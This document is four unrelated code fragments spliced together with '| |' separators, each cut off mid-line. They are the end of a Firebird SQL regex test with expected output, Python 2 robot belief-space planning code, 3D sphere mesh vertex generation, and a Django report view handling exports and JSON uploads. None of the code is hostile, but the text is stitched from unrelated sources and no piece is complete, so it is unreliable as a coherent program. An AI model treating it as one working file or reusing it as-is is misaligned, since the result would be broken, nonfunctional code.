'123', '(1|12[3]?)+' from rdb$database union all select
------------- core-0769
'ab', 'ab|cd|efg' from rdb$database union all select
'efg', 'ab|cd|efg' from rdb$database union all select
'a', 'ab|cd|efg' from rdb$database union all select -- 0
'', 'a*' from rdb$database union all select
'a', 'a*' from rdb$database union all select
'aaa', 'a*' from rdb$database union all select
'', 'a+' from rdb$database union all select -- 0
'a', 'a+' from rdb$database union all select
'aaa', 'a+' from rdb$database union all select
'', 'a?' from rdb$database union all select
'a', 'a?' from rdb$database union all select
'aaa', 'a?' from rdb$database union all select -- 0
'', 'a{2,}' from rdb$database union all select -- 0
'a', 'a{2,}' from rdb$database union all select -- 0
'aa', 'a{2,}' from rdb$database union all select
'aaa', 'a{2,}' from rdb$database union all select
'', 'a{2,4}' from rdb$database union all select -- 0
'a', 'a{2,4}' from rdb$database union all select -- 0
'aa', 'a{2,4}' from rdb$database union all select
'aaa', 'a{2,4}' from rdb$database union all select
'aaaa', 'a{2,4}' from rdb$database union all select
'aaaaa', 'a{2,4}' from rdb$database union all select -- 0
'', '_' from rdb$database union all select -- 0
'a', '_' from rdb$database union all select
'1', '_' from rdb$database union all select
'a1', '_' from rdb$database union all select -- 0
'', '%' from rdb$database union all select
'az', 'a%z' from rdb$database union all select
'a123z', 'a%z' from rdb$database union all select
'azx', 'a%z' from rdb$database union all select -- 0
'ab', '(ab){2}' from rdb$database union all select -- 0
'aabb', '(ab){2}' from rdb$database union all select -- 0
'abab', '(ab){2}' from rdb$database union all select
'b', '[abc]' from rdb$database union all select
'd', '[abc]' from rdb$database union all select -- 0
'9', '[0-9]' from rdb$database union all select
'9', '[0-8]' from rdb$database union all select -- 0
'b', '[^abc]' from rdb$database union all select -- 0
'd', '[^abc]' from rdb$database union all select
'3', '[[:DIGIT:]^3]' from rdb$database union all select -- 0
'4', '[[:DIGIT:]^3]' from rdb$database union all select
'4', '[[:DIGIT:]]' from rdb$database union all select
'a', '[[:DIGIT:]]' from rdb$database union all select -- 0
'4', '[^[:DIGIT:]]' from rdb$database union all select -- 0
'a', '[^[:DIGIT:]]' from rdb$database
);
"""
act_1 = isql_act('db_1', test_script_1, substitutions=substitutions_1)
expected_stdout_1 = """
STR WDWDWDWD
PTN ((DW)|(WD)){4}
str similar to %ptn% 1
subs(str similar to %ptn%) WDWDWDWD
STR AAXYAAXYAAAAXYAAAXYAA
PTN (AAXY|AAAX){2,}
str similar to %ptn% 1
subs(str similar to %ptn%) AAXYAAXY
STR YZZXYZZ0Z0YZZYZZYYZZZYZZ0Z0YZZ
PTN (0Z0(Y|Z)*){2}
str similar to %ptn% 1
subs(str similar to %ptn%) 0Z0YZZYZZYYZZZYZZ0Z0YZZ
STR AARARARAARARAR
PTN RA(AR){3}
str similar to %ptn% 1
subs(str similar to %ptn%) RAARARAR
STR eiavieieav
PTN (ie){2,}
str similar to %ptn% 1
subs(str similar to %ptn%) ieie
STR avieieavav
PTN (av|ie){2,}
str similar to %ptn% 1
subs(str similar to %ptn%) avieieavav
STR avieieieav
PTN ((av)|(ie)){2,}
str similar to %ptn% 1
subs(str similar to %ptn%) avieieieav
STR x/t
PTN %[/]t
str similar to ptn 1
subs(str similar to ptn) x/t
STR 2015-04-13
PTN [[:DIGIT:]]{4}[-][[:DIGIT:]]{2}[-][[:DIGIT:]]{2}
str similar to ptn 1
subs(str similar to ptn) 2015-04-13
STR WI-T3.0.0.31780 Firebird 3.0 Beta 2
PTN %[0-9]+.[0-9]+.[0-9]+((.?[0-9]+)*)[[:WHITESPACE:]]%
str similar to ptn 1
subs(str similar to ptn) WI-T3.0.0.31780 Firebird 3.0 Beta 2
STR m
PTN [p-k]
str similar to ptn 0
subs(str similar to ptn) <null>
STR 1
PTN (1|2){0,}
str similar to ptn 1
subs(str similar to ptn) 1
STR 1
PTN (1|2){0,1}
str similar to ptn 1
subs(str similar to ptn) 1
STR 1
PTN (1|2){1}
str similar to ptn 1
subs(str similar to ptn) 1
STR 123
PTN (1|12[3]?){1}
str similar to ptn 1
subs(str similar to ptn) 123
STR 123
PTN (1|12[3]?)+
str similar to ptn 1
subs(str similar to ptn) 123
STR ab
PTN ab|cd|efg
str similar to ptn 1
subs(str similar to ptn) ab
STR efg
PTN ab|cd|efg
str similar to ptn 1
subs(str similar to ptn) efg
STR a
PTN ab|cd|efg
str similar to ptn 0
subs(str similar to ptn) <null>
STR
PTN a*
str similar to ptn 1
subs(str similar to ptn)
STR a
PTN a*
str similar to ptn 1
subs(str similar to ptn) a
STR aaa
PTN a*
str similar to ptn 1
subs(str similar to ptn) aaa
STR
PTN a+
str similar to ptn 0
subs(str similar to ptn) <null>
STR a
PTN a+
str similar to ptn 1
subs(str similar to ptn) a
STR aaa
PTN a+
str similar to ptn 1
subs(str similar to ptn) aaa
STR
PTN a?
str similar to ptn 1
subs(str similar to ptn)
STR a
PTN a?
str similar to ptn 1
subs(str similar to ptn) a
STR aaa
PTN a?
str similar to ptn 0
subs(str similar to ptn) <null>
STR
PTN a{2,}
str similar to ptn 0
subs(str similar to ptn) <null>
STR a
PTN a{2,}
str similar to ptn 0
subs(str similar to ptn) <null>
STR aa
PTN a{2,}
str similar to ptn 1
subs(str similar to ptn) aa
STR aaa
PTN a{2,}
str similar to ptn 1
subs(str similar to ptn) aaa
STR
PTN a{2,4}
str similar to ptn 0
subs(str similar to ptn) <null>
STR a
PTN a{2,4}
str similar to ptn 0
subs(str similar to ptn) <null>
STR aa
PTN a{2,4}
str similar to ptn 1
subs(str similar to ptn) aa
STR aaa
PTN a{2,4}
str similar to ptn 1
subs(str similar to ptn) aaa
STR aaaa
PTN a{2,4}
str similar to ptn 1
subs(str similar to ptn) aaaa
STR aaaaa
PTN a{2,4}
str similar to ptn 0
subs(str similar to ptn) <null>
STR
PTN _
str similar to ptn 0
subs(str similar to ptn) <null>
STR a
PTN _
str similar to ptn 1
subs(str similar to ptn) a
STR 1
PTN _
str similar to | |
to complain that original conf collides - bad path?
return make_move(default_conf, hpn_end_conf) # Default config is the mode of a belief state? Closer to the actual value
elif action == 'move_no_base':
start_conf, end_conf = args
hpn_start_conf = hpn_from_or_conf(default_conf, or_robot, start_conf)
hpn_end_conf = hpn_from_or_conf(default_conf, or_robot, end_conf)
return make_move_no_base(hpn_start_conf, hpn_end_conf)
elif action == 'place':
obj, pose, _, _, pap = args
grasp_conf, approach_conf = pap.grasp_config, pap.vector_config # TODO - vector config makes a big difference here?
hpn_grasp_conf = hpn_from_or_conf(default_conf, or_robot, grasp_conf)
hpn_approach_conf = hpn_from_or_conf(default_conf, or_robot, approach_conf)
face_frames = belief.objects[obj].attrs['faceFrames'] # shape.faceFrames()
rest_face = 4 # TODO - expand to other faces
mu_pose = hu.Transform(trans_from_pose(pose.value)).compose(face_frames[rest_face]).pose().xyztTuple()
#mu_pose = xyzt_from_trans(pose.value).tolist()
return make_place(self.hand, obj, rest_face, mu_pose, hpn_grasp_conf, hpn_approach_conf)
elif action == 'look':
obj, look_config = args
hpn_look_conf = hpn_from_or_conf(default_conf, or_robot, look_config)
return make_look(obj, hpn_look_conf)
else:
raise NotImplementedError(action)
def policy(self, belief, goal):
# The positions of objects don't change as the robot moves (i.e they are in a global frame)
# The variances grow though as the robot moves
# The robot config has no uncertainty
# Thus, things are sort of relative to the robot
# Sample poses that are reachable given the uncertainty and can see the table
# Can ignore transition uncertainty for action effects
# Only need to keep track of uncertainty along hte first move action as a precondition
# Can either sample robot trajectory rollouts or object poses as the robot moves with increased uncertainty
# Just do large objects for base collisions
from manipulation.primitives.transforms import vector_trans
from manipulation.bodies.robot import approach_vector_from_object_trans
DISPLAY_GRASPS_HPN = False
if DISPLAY_GRASPS_HPN:
obj = 'objA'
conf = belief.pbs.getConf() # belief.conf # Default conf (i.e. base is wrong)
grasp_desc = belief.objects[obj].attrs['graspDesc']
shape = belief.objects[obj].attrs['shape']
print shape.parts()[0].vertices()
import util.windowManager3D as wm
win = 'W'
for i in range(len(grasp_desc)):
wm.getWindow(win).clear()
obj_trans = get_object_frame(conf, self.hand, grasp_desc[i])
#approach_trans = get_approach_frame(conf, self.hand)
#print np.round(approach_trans.matrix, 2)
approach_vector = or_from_hpn_approach_vector(conf.robot, self.hand, grasp_desc[i])
transformed_vector = approach_vector_from_object_trans(obj_trans.matrix, approach_vector)
obj_trans = hu.Transform(vector_trans(obj_trans.matrix, transformed_vector))
#temp_matrix = obj_trans.matrix.copy() # NOTE - this works as well?
#temp_matrix[:3, 3] = approach_trans.matrix[:3, 3]
#obj_trans = hu.Transform(temp_matrix)
#print shape.origin() # Origin
#print np.round(obj_trans.matrix, 2)
shape.applyTrans(obj_trans).draw(win, color='blue')
conf.draw(win, color='red')
raw_input('Continue?')
return None
assert not check_belief_collisions(belief, .9)
if satisfies(belief, goal):
return []
if self.plan is None:
env = get_env()
manip_problem = or_manipulation_problem(env, belief, goal)
#manip_problem.set_viewer(env)
self.oracle = ManipulationOracle(manip_problem, env, active_arms=[self.hand], reset_robot=False) # TODO - need to avoid resetting the original configuration
# TODO - try just replacing the current problem
DISPLAY_GRASPS_OR = False
if DISPLAY_GRASPS_OR: # NOTE - OR Grasps are from Manip to Pose (not Gripper)
from manipulation.bodies.robot import get_manip_trans, approach_vector_from_object_trans
from manipulation.primitives.transforms import object_trans_from_manip_trans, set_trans, point_from_trans
from manipulation.grasps.grasps import get_grasps
from manipulation.primitives.display import draw_arrow
obj = 'objA'
#set_trans(self.oracle.bodies[obj], np.eye(4))
#print self.oracle.bodies[obj].ComputeAABB()
#for grasp in get_grasps(self.oracle, obj): # NOTE - this randomizes the grasps
for grasp in get_or_grasps(self.oracle, obj):
manip_trans = get_manip_trans(self.oracle)
#grasp_trans = or_from_hpn_grasp(belief.conf.robot, self.hand, grasp_desc[i]).matrix
obj_trans = object_trans_from_manip_trans(manip_trans, grasp.grasp_trans)
set_trans(self.oracle.bodies[obj], obj_trans)
approach_vector = approach_vector_from_object_trans(obj_trans, grasp.approach_vector)
approach_trans = vector_trans(obj_trans, approach_vector)
_ = draw_arrow(env, point_from_trans(approach_trans), point_from_trans(obj_trans))
print
print grasp.approach_vector
print grasp.grasp_index
print np.round(obj_trans, 2)
raw_input('Continue?')
return None
# TODO - check that the plan is still good by converting the state
stream_problem = compile_problem(self.oracle)
self.oracle.draw_goals() # NOTE - this must be after compile_problem to ensure the goal_poses convert
if is_viewer_active(self.oracle.env):
raw_input('Start?')
search_fn = get_fast_downward('eager', verbose=False) # dijkstra | astar | wastar1 | wastar2 | wastar3 | eager | lazy
plan, universe = focused_planner(stream_problem, search=search_fn, greedy=False, stream_cost=10, verbose=False, debug=False)
#plan, universe = incremental_planner(stream_problem, search=search_fn, verbose=True, debug=False)
if plan is None:
plan = []
#visualize_plan(Plan(convert_state(self.oracle, stream_problem.initial_atoms),
# executable_plan(self.oracle, plan)), self.oracle, display=True, save=None)
#for state in get_states(universe, plan):
# or_state = convert_state(self.oracle, state)
# set_state(or_state, self.oracle)
# raw_input('Continue?')
look_iterations = 3
self.plan = []
state_sequence = get_states(universe, plan)
for i, (action, args) in enumerate(convert_plan(plan)):
or_state = convert_state(self.oracle, state_sequence[i])
set_state(or_state, self.oracle)
if action.name in ['move']:
last_config = self.oracle.get_robot_config()
for _ in range(look_iterations):
for obj in belief.objects:
if or_state.get(obj, True) is not None:
result = look_at_ik(self.oracle, obj)
if result is not None:
look_config = self.oracle.get_robot_config()
self.plan += [
('move_no_base', (last_config, look_config)),
('look', (obj, look_config)),
]
last_config = look_config # TODO - does this mean I have to change the next action config?
#print 'Looking at', obj
#raw_input('Pause')
self.plan.append((action.name, args))
elif action.name in ['pick', 'place']:
obj, pose, grasp, approach_config, pap = args
self.plan += [
('move_no_base', (approach_config, pap.vector_config)),
('move_no_base', (pap.vector_config, pap.grasp_config)),
(action.name, args),
('move_no_base', (pap.grasp_config, pap.vector_config)),
('move_no_base', (pap.vector_config, approach_config)),
]
if self.replan:
break
else:
self.plan.append((action.name, args))
#raw_input('Continue?')
print self.plan
if not self.plan:
return None
print SEPARATOR
action, args = self.plan.pop(0)
print action, args
if not self.plan and self.replan:
self.plan = None
return [self.convert_action(belief, action, args)] # NOTE - need to return a list for now
#################################################################
class TestAgent(object):
def __init__(self, exp, goal): # TODO - allow something else to be here?
self.exp = exp
self.goal = goal
self.iterations = 0
self.plan = None
def policy(self, belief, goal):
if satisfies(belief, goal):
return []
#if self.iterations != 0:
# return []
self.iterations += 1
if self.plan is not None:
if len(self.plan) == 0:
return []
return [self.plan.pop(0)]
print
print belief.pbs.__class__ # PBS (Planning Belief State?)
print belief.pbs.getWorld().__class__ # World
# TODO - realWorld is RealWorld or RobotEnv within PlanTest. Has executePrim within it
print 'Regions', self.exp.regions
USE_HAND = 'right'
print belief.makeObjGraspB(USE_HAND) # Gets the current grasp?
conf, (leftHeld, leftObjGraspType, leftObjGrasp), \
(rightHeld, rightObjGraspType, rightObjGrasp), objects = makeMLS(belief) # Extract MLS from b
objects_dict = {props[0]: props[1:] for props in objects}
robot = conf.robot
#print conf.cartConf()
print
name = 'objA'
type_name, support_face, pose = objects_dict[name]
wrapped_pose = hu.Pose(*pose)
identity_pose = hu.Pose(0, 0, 0, 0)
print wrapped_pose.matrix
print type_name, support_face, pose
geom, _ = glob.constructor[type_name](name=name)
grasp_desc = belief.objects[name].attrs['graspDesc']
grasp_index = 0
grasp = grasp_desc[grasp_index]
# G * M = P
print grasp.frame # Transform
print grasp.dx, grasp.dy, grasp.dz # Don't know what these do...
grasp_trans = grasp.frame.inverse().compose(wrapped_pose)
print robot.potentialBasePosesGen
print robot.inverseKinWristGen # Allows choosing base pose
print graspConfHypGen
#grasp_cart = RobotCartConf(grasp_trans, robot) # First argument must be a conf?
grasp_cart = conf.getCart()
grasp_cart = grasp_cart.set('pr2RightArm', grasp_trans)
print
print 'Kinematics'
print conf.getCart()
#print conf
#print robot.inverseKin(get_manip(conf), conf)
print robot.inverseKin(grasp_cart, conf)
print
# TODO - need to sample the base?
# Return plan with one move operation
currConf = copy.copy(conf)
goalConf = currConf.setBaseConf((0.2, 0.2, 0.2))
self.plan = [
make_move(currConf, goalConf),
make_pick(USE_HAND, name, grasp_desc, grasp_index, pose, tinyVar, currConf, currConf),
]
print
print conf
print leftHeld, leftObjGraspType, leftObjGrasp
print rightHeld, rightObjGraspType, rightObjGrasp
print objects
#print goal.satisfies(belief) # Nope
#print belief.satisfies(goal) # Nope
print goal
print self.plan
raw_input('Found plan! Continue?')
print
return None
#return None # Fail
#return [] # Sucess
return self.plan[:1] # NOTE - only the first step really matters
#################################################################
def test0():
var = tinyVar # bigVar | tinyVar
exp = Experiment({'tableIkea1' : (hu.Pose(1.3, 0.0, 0.0, math.pi/2.0), var)},
{'objA' : (hu.Pose(1.1, 0.0, ikZ, 0.0), var)},
['tableIkea1Top', 'tableIkea1Left'],
easy=False) # easy replaces the variance
#goal = emptyHand(hand)
#goal = holding('objA', hand=hand, graspType=grasp_type)
goal = inRegion(['objA'], 'tableIkea1Left')
return exp, goal
def testBusy(hardSwap=True, **args):
glob.rebindPenalty = 40
# Put this back to make the problem harder
#back = hu.Pose(1.1, 0.0, tZ, 0.0)
back = hu.Pose(1.45, 0.0, tZ, 0.0)
#parking1 = hu.Pose(1.15, 0.3, tZ, 0.0)
#parking2 = hu.Pose(1.15, -0.3, tZ, 0.0)
exp = Experiment({'table1' : (table1Pose, smallVar),
'table2' : (table2Pose, smallVar)},
{'objA' : (back, medVar),
'objB': (hu.Pose(1.15, -0.4, tZ, 0.0), medVar),
'objC': (hu.Pose(0.65, -1.2, tZ, 0.0), medVar),
'objD': (hu.Pose(1.15, -0.2, tZ, 0.0), medVar),
'objE': (hu.Pose(1.15, 0.0, tZ, 0.0), medVar),
'objF': (hu.Pose(1.15, 0.2, tZ, 0.0), medVar),
'objG': (hu.Pose(1.15, 0.4, tZ, 0.0), medVar)},
['table1Top', 'table2Top', 'table1MidFront',
'table1MidRear'],
easy=args.get('easy', False))
goal = inRegion(['objA', 'objB'], ['table1MidFront', 'table1MidRear']) # A on other table
goal1 = inRegion('objA', 'table2Top') # A and B on other table
goal2 = inRegion(['objA', 'objB'], 'table2Top') # B in back
goal3 = inRegion('objB', 'table1MidRear')
actualGoal = goal if hardSwap else goal3
return exp, actualGoal
#################################################################
def solve_belief(env, hand='right', grasp_type=0, no_window=True):
exp, goal = test0()
print SEPARATOR
#print glob.graspableNames # ['obj', 'soda', 'ts', 'handle', 'soup', 'oilBottle', 'rfunnel', 'bfunnel', 'sb']
#print glob.pushableNames | |
+ .5 * c / segs_tc
v = .5 + .5 * s * (-1. if inverted else 1.) / segs_tc
if tex_size:
u = (u - .5) * 2. * radius_h / tex_size[0] + .5
v = (v - .5) * 2. * radius_h / tex_size[1] + .5
if mat:
u, v = mat.xform_point(Point2(u, v))
else:
u = v = 0.
vert = {
"pos": (x, y, z),
"normal": normal,
"uv": (u, v)
}
verts.append(vert)
# Define the vertex order of the top cap triangles
for i in range(index_offset + 1, index_offset + segs_h + 1):
indices.extend((index_offset, i, i + 1))
# Define the top cap quad vertices
for i in range(1, segs_tc):
r = radius_h * (i + 1) / segs_tc
for j in range(segs_h + 1):
angle_h = delta_angle_h * j + (0. if inverted else slice_radians)
c = cos(angle_h)
s = sin(angle_h) * (-1. if inverted else 1.)
x = r * c
y = r * s
if has_uvs:
r_ = (i + 1) / segs_tc
u = .5 + .5 * c * r_
v = .5 + .5 * s * (-1. if inverted else 1.) * r_
if tex_size:
u = (u - .5) * 2. * radius_h / tex_size[0] + .5
v = (v - .5) * 2. * radius_h / tex_size[1] + .5
if mat:
u, v = mat.xform_point(Point2(u, v))
else:
u = v = 0.
vert = {
"pos": (x, y, z),
"normal": normal,
"uv": (u, v)
}
verts.append(vert)
# Define the vertex order of the top cap quads
index_offset += segs_h + 2
for i in range(1, segs_tc):
for j in range(segs_h):
vi1 = index_offset + j
vi2 = vi1 - segs_h - 1
vi3 = vi2 + 1
vi4 = vi1 + 1
indices.extend((vi1, vi3, vi2) if inverted else (vi1, vi4, vi2))
indices.extend((vi1, vi4, vi3) if inverted else (vi4, vi3, vi2))
index_offset += segs_h + 1
end = len(values) // stride
vert_ranges["top_cap"] = (top_cap_start_index, len(verts))
if segs_sc and slice and bottom_height < radius and top_height > -radius \
and thickness:
# Define the slice cap vertices
for cap_id in ("start", "end"):
index_offset = slice_cap_start_index = len(verts)
if cap_id == "start":
normal = (0., -1. if inverted else 1., 0.)
else:
angle_h = delta_angle_h * segs_h
c_h = cos(angle_h)
s_h = -sin(angle_h)
normal = Vec3(s_h, -c_h, 0.) * (-1. if inverted else 1.)
seg_vecs = []
if inner_radius:
inner_pos = []
if bottom_clip > -1.:
inner_pos.append(Point3(0., 0., inner_bottom_height))
seg_vecs.append(Vec3(0., 0., -thickness / segs_sc))
for i in range(segs_v + 1):
angle_v = bottom_angle + delta_angle_v * i
c = -cos(angle_v)
r = radius * sin(angle_v)
z = radius * c
i_angle_v = inner_bottom_angle + inner_delta_angle_v * i
i_c = -cos(i_angle_v)
i_r = inner_radius * sin(i_angle_v)
i_z = inner_radius * i_c
if cap_id == "start":
p = Point3(r, 0., z)
i_p = Point3(i_r, 0., i_z)
else:
p = Point3(r * c_h, r * s_h, z)
i_p = Point3(i_r * c_h, i_r * s_h, i_z)
inner_pos.append(i_p)
seg_vecs.append((p - i_p) / segs_sc)
if top_clip < 1.:
inner_pos.append(Point3(0., 0., inner_top_height))
seg_vecs.append(Vec3(0., 0., thickness / segs_sc))
else:
z = (top_height + bottom_height) * .5
h = (top_height - bottom_height) * .5
inner_pos = Point3(0., 0., z)
if bottom_clip > -1.:
seg_vecs.append(Vec3(0., 0., -h / segs_sc))
for i in range(segs_v + 1):
angle_v = bottom_angle + delta_angle_v * i
c = -cos(angle_v)
r = radius * sin(angle_v)
z = radius * c
if cap_id == "start":
p = Point3(r, 0., z)
else:
p = Point3(r * c_h, r * s_h, z)
seg_vecs.append((p - inner_pos) / segs_sc)
if top_clip < 1.:
seg_vecs.append(Vec3(0., 0., h / segs_sc))
if has_uvs:
cap_name = "slice_{}_cap".format(cap_id)
if tex_units and cap_name in tex_units:
tex_size = tex_units[cap_name]
u_f = 2 * radius / tex_size[0]
v_f = 2 * radius / tex_size[1]
else:
tex_size = None
mat = self._get_tex_xform(cap_name)
if inner_radius:
# Define the lower inner central vertex of the slice cap
if bottom_clip > -1.:
pos = inner_pos[0]
if has_uvs:
u = .5
v = .5 + .5 * pos.z / radius
if tex_size:
v = (v - .5) * v_f + .5
if mat:
u, v = mat.xform_point(Point2(u, v))
else:
u = v = 0.
vert = {
"pos": pos,
"normal": normal,
"uv": (u, v)
}
verts.append(vert)
index_offset += 1
# Define the main inner vertices of the slice cap quads
for i in range(segs_v + 1):
pos = inner_pos[i + (1 if bottom_clip > -1. else 0)]
vec = Vec3(pos)
if has_uvs:
if cap_id == "start":
u = .5 + .5 * pos.x / radius * (1. if inverted else -1.)
else:
vec[2] = 0.
u = .5 - .5 * vec.length() / radius * (1. if inverted else -1.)
v = .5 + .5 * pos.z / radius
if tex_size:
u = (u - .5) * u_f + .5
v = (v - .5) * v_f + .5
if mat:
u, v = mat.xform_point(Point2(u, v))
else:
u = v = 0.
vert = {
"pos": pos,
"normal": normal,
"uv": (u, v)
}
verts.append(vert)
index_offset += segs_v + 1
# Define the upper inner central vertex of the slice cap
if top_clip < 1.:
pos = inner_pos[-1]
if has_uvs:
u = .5
v = .5 + .5 * pos.z / radius
if tex_size:
v = (v - .5) * v_f + .5
if mat:
u, v = mat.xform_point(Point2(u, v))
else:
u = v = 0.
vert = {
"pos": pos,
"normal": normal,
"uv": (u, v)
}
verts.append(vert)
index_offset += 1
else:
# Define the center vertex of the slice cap
if has_uvs:
u = .5
v = .5 + .5 * inner_pos.z / radius
if tex_size:
v = (v - .5) * v_f + .5
if mat:
u, v = mat.xform_point(Point2(u, v))
else:
u = v = 0.
vert = {
"pos": inner_pos,
"normal": normal,
"uv": (u, v)
}
verts.append(vert)
for i in range(segs_sc):
# Define the lower central vertices of the slice cap
if bottom_clip > -1.:
i_p = inner_pos[0] if inner_radius else inner_pos
pos = i_p + seg_vecs[0] * (i + 1)
if has_uvs:
u = .5
v = .5 + .5 * pos.z / radius
if tex_size:
v = (v - .5) * v_f + .5
if mat:
u, v = mat.xform_point(Point2(u, v))
else:
u = v = 0.
vert = {
"pos": pos,
"normal": normal,
"uv": (u, v)
}
verts.append(vert)
# Define the main vertices of the slice cap polygons
for j in range(segs_v + 1):
index = j + (1 if bottom_clip > -1. else 0)
i_p = inner_pos[index] if inner_radius else inner_pos
pos = i_p + seg_vecs[index] * (i + 1)
vec = Vec3(pos)
if has_uvs:
if cap_id == "start":
u = .5 + .5 * pos.x / radius * (1. if inverted else -1.)
else:
vec[2] = 0.
u = .5 - .5 * vec.length() / radius * (1. if inverted else -1.)
v = .5 + .5 * pos.z / radius
if tex_size:
u = (u - .5) * u_f + .5
v = (v - .5) * v_f + .5
if mat:
u, v = mat.xform_point(Point2(u, v))
else:
u = v = 0.
vert = {
"pos": pos,
"normal": normal,
"uv": (u, v)
}
verts.append(vert)
# Define the upper central vertices of the slice cap
if top_clip < 1.:
i_p = inner_pos[-1] if inner_radius else inner_pos
pos = i_p + seg_vecs[-1] * (i + 1)
if has_uvs:
u = .5
v = .5 + .5 * pos.z / radius
if tex_size:
v = (v - .5) * v_f + .5
if mat:
u, v = mat.xform_point(Point2(u, v))
else:
u = v = 0.
vert = {
"pos": pos,
"normal": normal,
"uv": (u, v)
}
verts.append(vert)
if i == 0 and not inner_radius:
| |
mode = request.GET.get("mode", None)
if mode:
# Store the mode passed in the URL on the session to remember for the next report
request.session["mode"] = mode
else:
# Pick up the mode from the session
mode = request.session.get("mode", "graph")
is_popup = "_popup" in request.GET
sidx, sord = cls.getSortName(request)
autofilter = "noautofilter" not in request.GET and cls.autofilter
filters = cls.getQueryString(request)
if not filters and request.prefs and autofilter:
# Inherit the filter settings from the preferences
filters = request.prefs.get("filter", None)
if request.prefs and autofilter:
page = request.prefs.get("page", 1) or 1
else:
page = 1
context = {
"reportclass": cls,
"title": _("%(title)s for %(entity)s")
% {"title": force_str(cls.title), "entity": force_str(args[0])}
if args and args[0]
else cls.title,
"post_title": cls.post_title,
"preferences": request.prefs,
"reportkey": reportkey,
"colmodel": cls._render_colmodel(
request, is_popup, request.prefs, mode, *args, **kwargs
),
"cross_idx": cross_idx,
"cross_list": cross_list,
"object_id": args and quote(args[0]) or None,
"page": page,
"sord": sord,
"sidx": sidx,
"default_sort": cls.defaultSortString(request),
"is_popup": is_popup,
"filters": json.loads(filters) if filters else None,
"args": args,
"bucketnames": bucketnames,
"model": cls.model,
"scenario_permissions": scenario_permissions,
"hasaddperm": cls.editable
and cls.model
and (
request.user.has_perm(
"%s.%s"
% (
cls.model._meta.app_label,
get_permission_codename("add", cls.model._meta),
)
)
or "add" not in cls.model._meta.default_permissions
),
"hasdeleteperm": cls.editable
and cls.model
and (
request.user.has_perm(
"%s.%s"
% (
cls.model._meta.app_label,
get_permission_codename("delete", cls.model._meta),
)
)
or "delete" not in cls.model._meta.default_permissions
),
"haschangeperm": cls.editable
and cls.model
and (
request.user.has_perm(
"%s.%s"
% (
cls.model._meta.app_label,
get_permission_codename("change", cls.model._meta),
)
)
or "change" not in cls.model._meta.default_permissions
),
"active_tab": "plan",
"mode": mode,
"actions": cls.actions,
}
for k, v in cls.extra_context(request, *args, **kwargs).items():
context[k] = v
return render(request, cls.template, context)
elif fmt == "json":
# Return JSON data to fill the grid.
response = StreamingHttpResponse(
content_type="application/json; charset=%s" % settings.DEFAULT_CHARSET,
streaming_content=cls._generate_json_data(request, *args, **kwargs),
)
response["Cache-Control"] = "no-cache, no-store"
return response
elif fmt in ("spreadsheetlist", "spreadsheettable", "spreadsheet"):
scenarios = request.GET.get("scenarios", None)
scenario_list = scenarios.split(",") if scenarios else [request.database]
# Make sure scenarios are in the scenario_permissions list
if scenarios:
accepted_scenarios = [t[0] for t in scenario_permissions]
scenario_list = [x for x in scenario_list if x in accepted_scenarios]
# Return an excel spreadsheet
output = BytesIO()
cls._generate_spreadsheet_data(
request, scenario_list, output, *args, **kwargs
)
response = HttpResponse(
content_type="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet",
content=output.getvalue(),
)
# Filename parameter is encoded as specified in rfc5987
if callable(cls.title):
title = cls.title(request, *args, **kwargs)
else:
title = cls.model._meta.verbose_name_plural if cls.model else cls.title
response[
"Content-Disposition"
] = "attachment; filename*=utf-8''%s.xlsx" % urllib.parse.quote(
force_str(title)
)
response["Cache-Control"] = "no-cache, no-store"
return response
elif fmt in ("csvlist", "csvtable", "csv"):
scenarios = request.GET.get("scenarios", None)
scenario_list = scenarios.split(",") if scenarios else [request.database]
# Make sure scenarios are in the scenario_permissions list
if scenarios:
accepted_scenarios = [t[0] for t in scenario_permissions]
scenario_list = [x for x in scenario_list if x in accepted_scenarios]
# Return CSV data to export the data
response = StreamingHttpResponse(
content_type="text/csv; charset=%s" % settings.CSV_CHARSET,
streaming_content=cls._generate_csv_data(
request, scenario_list, *args, **kwargs
),
)
# Filename parameter is encoded as specified in rfc5987
if callable(cls.title):
title = cls.title(request, *args, **kwargs)
else:
title = cls.model._meta.verbose_name_plural if cls.model else cls.title
response[
"Content-Disposition"
] = "attachment; filename*=utf-8''%s.csv" % urllib.parse.quote(
force_str(title)
)
response["Cache-Control"] = "no-cache, no-store"
return response
elif fmt == "kanban":
response = StreamingHttpResponse(
content_type="application/json; charset=%s" % settings.DEFAULT_CHARSET,
streaming_content=cls._generate_kanban_data(request, *args, **kwargs),
)
response["Cache-Control"] = "no-cache, no-store"
return response
elif fmt == "calendar":
response = StreamingHttpResponse(
content_type="application/json; charset=%s" % settings.DEFAULT_CHARSET,
streaming_content=cls._generate_calendar_data(request, *args, **kwargs),
)
response["Cache-Control"] = "no-cache, no-store"
return response
else:
raise Http404("Unknown format type")
@classmethod
def _generate_kanban_data(cls, request, *args, **kwargs):
raise Http404("This report doesn't support the kanban format")
@classmethod
def _generate_calendar_data(cls, request, *args, **kwargs):
raise Http404("This report doesn't support the calendar format")
@classmethod
def parseJSONupload(cls, request):
# Check permissions
if not cls.model or not cls.editable:
return HttpResponseForbidden(_("Permission denied"))
permname = get_permission_codename("change", cls.model._meta)
if not request.user.has_perm("%s.%s" % (cls.model._meta.app_label, permname)):
return HttpResponseForbidden(_("Permission denied"))
# Loop over the data records
resp = HttpResponse()
ok = True
with transaction.atomic(using=request.database, savepoint=False):
content_type_id = ContentType.objects.get_for_model(
cls.model, for_concrete_model=False
).pk
for rec in json.JSONDecoder().decode(
request.read().decode(request.encoding or settings.DEFAULT_CHARSET)
):
if "delete" in rec:
# Deleting records
for key in rec["delete"]:
sid = transaction.savepoint(using=request.database)
try:
obj = cls.model.objects.using(request.database).get(pk=key)
Comment(
user_id=request.user.id,
content_type_id=content_type_id,
object_pk=force_str(key),
object_repr=force_str(obj)[:200],
type="delete",
comment="Deleted %s." % force_str(obj),
).save(using=request.database)
obj.delete()
transaction.savepoint_commit(sid)
except cls.model.DoesNotExist:
transaction.savepoint_rollback(sid)
ok = False
resp.write(escape(_("Can't find %s" % key)))
resp.write("<br>")
except Exception as e:
transaction.savepoint_rollback(sid)
ok = False
resp.write(escape(e))
resp.write("<br>")
elif "copy" in rec:
# Copying records
for key in rec["copy"]:
sid = transaction.savepoint(using=request.database)
try:
obj = cls.model.objects.using(request.database).get(pk=key)
orig_repr = force_str(obj)
if isinstance(cls.model._meta.pk, CharField):
# The primary key is a string
obj.pk = "Copy of %s" % key
elif isinstance(cls.model._meta.pk, AutoField):
# The primary key is an auto-generated number
obj.pk = None
else:
raise Exception(
